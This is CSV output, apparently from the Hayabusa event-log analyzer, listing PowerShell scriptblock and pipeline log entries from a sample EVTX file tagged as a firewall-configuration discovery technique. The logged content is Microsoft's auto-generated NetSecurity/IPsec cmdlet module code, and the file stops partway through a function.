+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetSecDeltaCollection"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecPolicyChange</DefaultNoun> </Class> <Enums> <Enum EnumName=""NetSecurity.ChangeAction"" UnderlyingType=""uint16""> <Value Name=""Add"" Value=""0""/> <Value Name=""Delete"" Value=""1""/> </Enum> <Enum EnumName=""NetSecurity.EndpointType"" UnderlyingType=""uint16""> <Value Name=""Endpoint1"" Value=""0""/> <Value Name=""Endpoint2"" Value=""1""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetIPsecDoSPSetting"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecDospSetting</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""ElementName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""StateIdleTimeoutSeconds""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""StateIdleTimeoutSeconds""/> </Parameter> <Parameter ParameterName=""PerIPRateLimitQueueIdleTimeoutSeconds""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""PerIPRateLimitQueueIdleTimeoutSeconds""/> </Parameter> <Parameter ParameterName=""IpV6IPsecUnauthDscp""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6IPsecUnauthDscp""/> </Parameter> <Parameter ParameterName=""IpV6IPsecUnauthRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6IPsecUnauthRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""IpV6IPsecUnauthPerIPRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6IPsecUnauthPerIPRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""IpV6IPsecAuthDscp""> <Type PSType=""uint16""/> <CmdletParameterMetadata PSName=""IpV6IPsecAuthDscp""/> </Parameter> <Parameter ParameterName=""IpV6IPsecAuthRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6IPsecAuthRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""IcmpV6Dscp""> <Type PSType=""uint16""/> <CmdletParameterMetadata PSName=""IcmpV6Dscp""/> </Parameter> <Parameter ParameterName=""IcmpV6RateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IcmpV6RateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""IpV6FilterExemptDscp""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6FilterExemptDscp""/> </Parameter> <Parameter ParameterName=""IpV6FilterExemptRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6FilterExemptRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""DefBlockExemptDscp""> <Type PSType=""uint16""/> <CmdletParameterMetadata PSName=""DefBlockExemptDscp""/> </Parameter> <Parameter ParameterName=""DefBlockExemptRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""DefBlockExemptRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""MaxStateEntries""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxStateEntries""/> </Parameter> <Parameter ParameterName=""MaxPerIPRateLimitQueues""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxPerIPRateLimitQueues""/> </Parameter> <Parameter ParameterName=""EnabledKeyingModules""> <Type PSType=""NetSecurity.DospKeyModules""/> <CmdletParameterMetadata PSName=""EnabledKeyingModules""/> </Parameter> <Parameter ParameterName=""FilteringFlags""> <Type PSType=""NetSecurity.DospFlags""/> <CmdletParameterMetadata PSName=""FilteringFlags""/> </Parameter> <Parameter ParameterName=""PublicInterfaceAliases""> <Type PSType=""System.Management.Automation.WildcardPattern[]""/> <CmdletParameterMetadata PSName=""PublicInterfaceAliases""/> </Parameter> <Parameter ParameterName=""PrivateInterfaceAliases""> <Type PSType=""System.Management.Automation.WildcardPattern[]""/> <CmdletParameterMetadata PSName=""PrivateInterfaceAliases""/> </Parameter> <Parameter ParameterName=""PublicV6Address""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PublicV6Address""/> </Parameter> <Parameter ParameterName=""PrivateV6Address""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PrivateV6Address""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""ElementName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByName""/> </RegularQuery> </Property> </QueryableProperties> </GetCmdletParameters> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> </InstanceCmdlets> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""New"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:CreateInstance""> <Parameters> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""Name""/> </Parameter> <Parameter ParameterName=""StateIdleTimeoutSeconds""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""StateIdleTimeoutSeconds""/> </Parameter> <Parameter ParameterName=""PerIPRateLimitQueueIdleTimeoutSeconds""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""PerIPRateLimitQueueIdleTimeoutSeconds""/> </Parameter> <Parameter ParameterName=""IpV6IPsecUnauthDscp""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6IPsecUnauthDscp""/> </Parameter> <Parameter ParameterName=""IpV6IPsecUnauthRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6IPsecUnauthRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""IpV6IPsecUnauthPerIPRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6IPsecUnauthPerIPRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""IpV6IPsecAuthDscp""> <Type PSType=""uint16""/> <CmdletParameterMetadata PSName=""IpV6IPsecAuthDscp""/> </Parameter> <Parameter ParameterName=""IpV6IPsecAuthRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6IPsecAuthRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""IcmpV6Dscp""> <Type PSType=""uint16""/> <CmdletParameterMetadata PSName=""IcmpV6Dscp""/> </Parameter> <Parameter ParameterName=""IcmpV6RateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IcmpV6RateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""IpV6FilterExemptDscp""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6FilterExemptDscp""/> </Parameter> <Parameter ParameterName=""IpV6FilterExemptRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""IpV6FilterExemptRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""DefBlockExemptDscp""> <Type PSType=""uint16""/> <CmdletParameterMetadata PSName=""DefBlockExemptDscp""/> </Parameter> <Parameter ParameterName=""DefBlockExemptRateLimitBytesPerSec""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""DefBlockExemptRateLimitBytesPerSec""/> </Parameter> <Parameter ParameterName=""MaxStateEntries""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxStateEntries""/> </Parameter> <Parameter ParameterName=""MaxPerIPRateLimitQueues""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxPerIPRateLimitQueues""/> </Parameter> <Parameter ParameterName=""EnabledKeyingModules""> <Type PSType=""NetSecurity.DospKeyModules""/> <CmdletParameterMetadata PSName=""EnabledKeyingModules""/> </Parameter> <Parameter ParameterName=""FilteringFlags""> <Type PSType=""NetSecurity.DospFlags""/> <CmdletParameterMetadata PSName=""FilteringFlags""/> </Parameter> <Parameter ParameterName=""PublicInterfaceAliases""> <Type PSType=""System.Management.Automation.WildcardPattern[]""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""PublicInterfaceAliases""/> </Parameter> <Parameter ParameterName=""PrivateInterfaceAliases""> <Type PSType=""System.Management.Automation.WildcardPattern[]""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""PrivateInterfaceAliases""/> </Parameter> <Parameter ParameterName=""PublicV6Address""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PublicV6Address""/> </Parameter> <Parameter ParameterName=""PrivateV6Address""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PrivateV6Address""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.DospKeyModules"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""None"" Value=""0""/> <Value Name=""IkeV1"" Value=""1""/> <Value Name=""IkeV2"" Value=""2""/> <Value Name=""AuthIP"" Value=""4""/> </Enum> <Enum EnumName=""NetSecurity.DospFlags"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""None"" Value=""0""/> <Value Name=""DisableDefaultBlock"" Value=""8""/> <Value Name=""FilterBlock"" Value=""16""/> <Value Name=""FilterExempt"" Value=""32""/> </Enum> <Enum EnumName=""NetSecurity.AddressVersion"" UnderlyingType=""uint16"" BitwiseFlags=""true""> <Value Name=""None"" Value=""0""/> <Value Name=""IPv4"" Value=""1""/> <Value Name=""IPv6"" Value=""2""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.082 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = 